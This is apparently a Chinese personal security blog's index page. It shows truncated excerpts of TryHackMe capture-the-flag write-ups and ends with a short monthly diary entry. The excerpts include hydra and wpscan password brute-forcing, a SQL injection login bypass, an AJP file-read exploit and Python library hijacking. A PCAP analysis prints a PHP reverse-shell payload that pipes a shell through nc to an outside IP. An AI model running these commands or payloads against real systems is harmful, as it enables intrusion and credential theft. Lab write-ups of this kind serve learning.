MikannseのSekai

端口扫描 Web8080端口登进发现是一个tomcat的网页 扫目录也只是扫出这三个 根据提示是一个CVE-2020-1938 下载POC https://github.com/nibiwodong/CNVD-2020-10487-Tomcat-ajp-POC python3 ajpShooter.py http://10.10.152.114:8080 8009 /WEB-INF/web.xml read 可能读取服务器的配置文件 找到了一个用户名和密码 skyfuck:8730281lkjlkjdqlksalks Getshellssh登录，发现家目录里面有两个文件 cat /etc/passwd 发现还有一个叫merlin的用户，大概率是要转移到他那边 用scp将那两个文件下载到kali，应该是一个GPG文件还有那对应的密钥 发现导入密钥时还要密码 那就用john来爆破 gpg2john tryhackme.asc >hash.txt 将密钥转成可爆破的hash gpg --import tryhackme.ascgpg --decrypt-file creden ...

端口扫描 Web先扫一下目录 让我们keep going 在/r的基础下再扫 然后一直扫之后 来到了/r/a/b/b/i/t目录，在这基础上也扫不出目录了 Getshell右键查看源代码，难绷的是直接给了ssh的用户密码 alice:HowDothTheLittleCrocodileImproveHisShiningTail 然后直接就登陆了，啊这 看一下，发现还有其他几个看起来比较重要的用户 alice的家目录里有一个不可以访问的root.txt和一个python脚本，这个脚本的作用只是将这首诗随机选10行输出出来，大概没什么用，不得不说这个房间的氛围感拉满233 sudo -l 发现alice能以rabbit的身份执行这个Python脚本 没啥思路，看了下WP，用的是python的库劫持，新知识点。因为所执行的Python脚本导入了random的库，实际上也就是导入了random.py这个文件，而且python的一个特性是寻找最近的文件，也就是说我们在/home/alice这个目录下建一个名叫“random.py”的文件也就是最近的文件了，会执行它,random.p ...

端口扫描 基本上是先从21,80端口入手了，先去80看看 Webgobuster dir -u http://10.10.169.214/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 一边日常挂着扫目录，然后我们看看网页 到后面发现扫不出啥东西。。。 从nmap扫出来的两个页面看看 icons应该是存放一些图标图片什么的，没太多有用的信息 backups里面 下载得到一个gpg文件和一个私钥 gpg -d CustomerDetails.xlsx.gpg 发现要密码，上网搜了一下，要先导入私钥 gpg --import priv.key gpg --decrypt-file CustomerDetails.xlsx.gpg 解出一个Excel文件，kali里面好像打不开，我是在windows主机里打开的 发现是三个客户名称？ 发现ftp不能匿名登录，那就试着用得到的三个用户来登录 发现用paradox能成功ftp登录，在ftp登录后最好输入“binary”，来写换成二进制模式来下载文件，否 ...

端口扫描 Nmap扫描还是得多扫几次，第一次扫出来没有结果 Web 打开看了一下，大概是一个密码管理软件？说密码复用什么7788的 Gobuster爆破一下目录，我们再随便翻一下有没有什么有用的信息 在AboutUs界面 能找到他们工作人员的名字，可能可以当做用户名，记录一下 Ninja - Lead Developer Pars - Shibe Enthusiast and Emotional Support Animal Manager Szymex - Head Of Security Bee - Chief Drinking Water Coordinator MuirlandOracle - Cryptography Consultant 在/admin可以找他们的后台，那就试着用Ninja当用户名爆破一下密码 hydra -l Ninja -P /usr/share/wordlists/rockyou.txt 10.10.226.91 http-post-form "/api/login:username=^USER^&password=^PASS^:Inc ...

端口扫描 Web打开80端口是一些不明所以的界面，花里胡哨的很符合对嗨客的印象（ 用gobuster扫一下目录 gobuster dir -u http://10.10.155.86/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 扫出来的大概是这些目录，每个目录都要简单的翻一下 在/robots目录可以找到两个文件，访问看看 第二个文件就是key1 073403c8a58a1f80d943455fb30724b9 第一个下载完打开感觉像是密码的字典？ 既然有wordpress，那就上WPscan扫一下 wpscan --url http://10.10.155.86/ 可以看到主题又是这个熟悉的twentyfifteen 本来想着是不是wordpress的用户名是user，然后指定用户名去爆破密码的，发现爆不出来 看了下WP，在登录界面，会提示用户名是否正确，用户名不存在则会提醒Invalid username，存在则会提醒密码不正确，根据这个特性，可以用burpsuite来测试用户名，利用 ...

分析PCAP他们用来上传反向shell的页面的URL是什么？ 上传的话应该要涉及到http,那就过滤http协议 找到一条疑似shell的数据，追踪http流 那么URL就是/development/ 攻击者使用了什么有效载荷来获得访问权限？ 就是上面我划出来的那一条，reverse shell <?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?> 攻击者使用了什么密码来保护c？ 应该是连接shell之后，攻击者一系列的操作，那追踪TCP流看看，翻到第三个，追踪TCP流 可以看到一系列的操作 密码就是whenevernoteartinstant 攻击者如何建立持久性？ 上面那个数据包往下翻 应该是下了一个ssh的后门文件 https://github.com/NinjaJc01/ssh-backdoor 使用快速通道单词表，有多少系统密码是可以破解 ...

端口扫描 Web 打开网站的根目录是一个Apache的页面 日常扫一下目录，再结合一下nmap扫描的结果 进/blog页面看一下 应该是一个博客界面，根据上面漏洞扫描的结果等可以知道是一个WP搭建的站点，那么能利用的点就很多了，Wpscan什么的也能用。看下有没有可以利用的信息。这个页面似乎没有。 那就直接进登录界面 看看能不能用WPscan列举一下用户 wpscan --url http://internal.thm/wordpress/ --enumerate u 发现一个admin用户 还有WP使用的主题 没有插件 试着暴力破解一下密码 wpscan --url http://internal.thm/wordpress/ -P /usr/share/wordlists/rockyou.txt -U admin 密码是my2boys 发现成功登录后台 Getshell在之前可以得到WP的主题是tentyseventeenn,可以知道有一个非常著名的漏洞：在Appearance中可以修改主题 试着将index.php改成reverseshell（注意是PHP ...

端口扫描 用nmap自带的脚本扫一下有没有漏洞，发现了有一个RCE漏洞 Web 简单扫一下目录 大概率是没什么东西了 因为看到了3389这个端口开着，在前几篇的一个《钓鱼网站简单渗透测试》中就碰到过这玩意，还是挺熟悉的，那就直接用msf看看漏洞可不可用 发现好像没有 SMB服务那就直接从nmap发现的漏洞入手吧 use 4set LHOST tun0set RHOST 10.10.109.175run 发现运行不了 才发现这个房间好像不让用msf捏 查了一下，这好像是很有名的“永恒之蓝”漏洞？ 那就先试着不用msf 既然是SMB服务上的漏洞，先试着用enum4linux扫描 发现也是什么都没有 smbclient -L 10.10.109.175 用来列举共享资源，发现不用密码（直接回车）就可以列举 也是不用密码就可以连接 get下来的password是这玩意，大概是base64编码过的 Bob - !P@$$W0rD!123 Bill - Juw4nnaM4n420696969!$$$ 解码出来是这些东西,猜测是两个用户名和密码 上面扫描过程中发现3389 ...

端口扫描 Web谁抢了银行：SpiderMan 我直接:????? 日常进行目录扫描 gobuster dir -u http://10.10.74.159 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 扫出来大概是这些目录 THM问joomla的版本是多少，打开Wap插件看一下也确实是这个CMS 可以用joomscan来判断版本，kali中sudo apt-get install joomscan安装 joomscan -u http://10.10.74.159/ 开启扫描 发现版本是3.7.0，而且也能列出目录 有了版本号就可以找漏洞了 searchsploit joomla 3.7.0 直接上github找个SQL注入的脚本 https://github.com/teranpeterson/Joomblah 得到密码hash $2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm hash-identifier竟 ...

端口扫描 SMB服务发现有POP3和IMAP服务，感觉大概率和邮件有关，还是第一次接触这样的靶机 问Miles的邮箱密码，嘶没什么思路，一开始还用hydra来爆破IMAP端口，发现好像不行，看了下THM的提示，Enumerate Samba 于是试着用enum4linux来枚举SMB服务 kali中enum4linux ip 发现一个共享anonymous可以访问 smbclient //ip/共享 进行连接 ls发现了一个文本和一个logs文件夹 把全部get到本地，如get attention.txxt 总之就是所有人的密码被改了什么之类的 log的内容就很吸引人了，像是用户名（密码？） log2和3都是空的，，， Web到这里的线索似乎断了，因为不知道这个用于什么的，感觉方向太多，又是IMAP又是POP3什么的。先进入80的WEB端口看看 就这么一个界面，啥都没有，试着用gobuster爆破下目录 gobuster经常性感觉会出一些网络问题导致丢包。。。 找到个/admin的目录，进去看看，发现访问不了 试了几个发现就squirrelmail能访问，进去是个登录 ...

端口扫描 只开放了两个端口，大概率是在80端口做文章了 Web百度识图：杀手3主人公Agent 47 Sql注入手注在用户名输入: ‘or 1=1 – - 密码不填 查询语句变成 SELECT * FROM users WHERE username = ''or 1=1 -- -' AND password := 前面为真，后面被注释，直接登录 被重定向到portal.php界面 SQLmap直接跟着做 右键保存至文件 在SQLmap中运行 sqlmap -r /home/mikannse/request –dbms=mysql –dump hash:ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14 用户名:agent47 翻一下上面的记录，另外一个表名是post 密码爆破先识别一下哈希的类型 hash-identifier ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14 根据结果大概率是SHA-256 用john ...

​ 博客建立以来第一篇杂谈，打算每个月都写一点东西，总结记录下这个月的一些7788的东西。真的算得上是忙碌的一个月，虽然前后反差还挺大的。从准确来说是从上个月底的黑盾杯和国赛开始一直到前不久刚结束的各种考试，真的算是一直绷着神经硬撑到考试结束233，算是大学以来最忙碌的一段时间吧。每年的六月都算是最喜欢的时期吧，去年是考完高考的放松吧，不知不觉成为带学生已经一年了捏，而且也到了最喜欢的暑期。然后还有“日记周年”的时间，感觉是每一年中最年轻的一个月吧（笑)。考完试还是比较放松的吧，放松但不代表清闲，反而有很多事情想要做，但不是很多事情要被做。憋了一个月的THM瘾犯了，动力满满地疯狂学习+打靶机，还是挺开心的捏。但是放假后的时间几乎除了晚上回宿舍睡觉都呆在图书馆吧，前几天倒是和朋友久违的出去玩了一整天，很放松很开心的感觉，主要想做的事情实在是太多了。搭了一直想搭的博客，然后多多少少都会记录下发布一些文章，留给后人或者同好看233，主要还是想记录下人生什么的。这个月好像前几个都开始看的大江健三郎的《万延元年的FOOTBALL》是这个月一直在看的，真的是难读的一本书啊，也许是自己越来越浮躁而读 ...